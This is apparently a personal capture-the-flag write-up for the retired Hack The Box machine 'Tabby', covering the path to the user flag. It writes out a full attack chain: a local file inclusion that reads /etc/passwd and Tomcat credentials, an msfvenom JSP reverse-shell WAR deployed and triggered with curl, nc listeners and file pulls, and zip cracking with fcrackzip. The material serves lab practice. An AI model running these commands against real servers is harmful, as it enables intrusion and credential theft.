This is my write up for how I got the user flag for Tabby.
The plan was to get the root flag but I did not check to see which machine HTB was retiring the week I did Tabby and by the time I noticed it had already been retired.
Reconnaissance
Nmap
So as is the way, I get nmap to get the ball rolling with the following command:
nmap -sV -sC -oA nmap/tabby 10.10.10194 -v
Thanks to Ippsec for the above command but let’s break it down.
From the nmap help pages:
-sV = -sV: Probe open ports to determine service/version info
-sC = Script scanning — They commonly perform tasks such as detecting service vulnerabilities, malware discovery, collecting more information from databases and other network services, and advanced version detection. NSE is not executed unless you request it with options such as — script or -sC.
-oA = -oA <basename>: Output in the three major formats at once
-v is used to increase the verbosity level, it displays open ports to the terminal as soon as it finds one.
Great, we see 3 open ports. 22 for ssh which is used for remote access via a secure shell.
80 for HTTP to access the Apache webserver. This is not secure, meaning the data is sent in plain text. We can see it is running an Apache webserver so most likely it is only serving static content.
And port 8080 which is running Apache Tomcat. Now Tomcat is used to run Java code, this is an important note for later.
Ok, before I move on to investigating the webpage on port 80, I like to have some recon tools running in the background.
Normally I run nmap to scan for UDP ports, for example:
nmap -sUV <IP> -v
and I like to run gobuster, for example:
gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/dirb/common.txt
but for this box, they did not present, what I felt, groundbreaking steps to get the root flag. So to keep it simple, I won’t put the command and results.
The website
Now we go to the website, we’ll go to port 80 first — http://10.10.10.194
After looking around nothing really grabs my attention except for:
So we take note and come back to it later. Sometimes after poking around a website and its service we can determine how we could use this to our advantage.
Next up, port 8080:
So reading the above web page, I get a strong inclination that using the previous URL we found on the website on port 80 we may have to do a Local File Intrusion (LFI).
LFI
So a quick check using the following tool: https://github.com/sUbc0ol/LFI-scanner
python ./lfiscan.py — url=”http://megahosting.htb/news.php?file=statement"
We find that the URL is vulnerable to a LFI:
Great, let’s run this through burp’s proxy and see what we get.
Intercept the request via Burp Proxy, I then send it over to the repeater tool and send the request:
We have access to the passwd file.
I do a quick search for “sh” to see which account has access to a shell and the most notable account is “ash”.
Ok, returning back to the Tomcat page( on port 8080), we can see some file paths on the web page. The one we want to play around with is: /etc/tomcat9/tomcat-users.xml
So I had to play around with the file path to get the tomcat-users.xml file. All the information is on the Tomcat webpage but I did have to do some Google searching to understand the path convention. Alternatively, what I could have done was installed Apache Tomcat on my machine and run it locally. That would have been better from a learning perspective.
In the response, we can see a username and password — tomcat:$3cureP4s5w0rd123!
On the Tomcat page, it has a URL to the admin panel, which requires a username and password….
Once logged in you’re taken to the host manager webpage.
Ok, so here I got stuck and it took me some Googling, playing around to finally understand what the next step was, I made a note of the following website which led me to the answer:
https://www.certilience.fr/2019/03/tomcat-exploit-variant-host-manager/
https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html
https://stackoverflow.com/questions/14222215/tomcat-7-tomcat-users-manager-script-example-for-deploy
Long researching cut short, you have to upload a .war file which contains a reverse shell which is written in Java (remember Tomcat runs java files), then run a local listener, call the instance you created when you uploaded the .war and it will execute the reverse shell and your listener will then become a shell to the box.
Note — A .war file (Web Application Resource file) is a collection of file to make a web application. — https://en.wikipedia.org/wiki/WAR_(file_format)
And this is the format Tomcat accepts and can execute our reverse shell.
Getting a shell
https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/ — has msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
The above is to created our .war file which will contain our reverse shell.
curl -u ‘tomcat’:’$3cureP4s5w0rd123!’ -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/webapp
The above command is used to upload the shell.war file. “webapp” is just to name our appBase directory.
Create our listener:
nc -lnvp 4444
Call our “webapp”:
curl -u ‘tomcat’:’$3cureP4s5w0rd123!’ http://10.10.10.194:8080/ttshell/
This will execute our reverse shell and it will pop a shell on our listener —
Great, and remember “ash”, which means we know who we need to try and attack.
Getting the user flag
Poking around as tomcat you find a backup, which is a good thing. We pull the backup locally and see what we can find:
nc -lvnp 2005 > backupHTML.zip
nc -w 4 <ip> 2005< 16162020_backup.zip
The -w option is for: timeout for connects and final net reads
Once you have the backup file locally, I tried to unzip it but it’s password protected. So I send it through fcrackzip:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt backupHTML.zip
and it does crack it and the password is: admin@it
We use the password to unzip the file and poke around the files….annnnnd I found nothing. The files contain nothing useful for me to use.
But in good old HTB fashion (and since I’ve run into this in the past) I try to ‘su’ into ash on the reverse shell I got….
and….
well…the user flag is yours for the taking.
Thanks all, hopefully, next time I’ll get root before it retires :)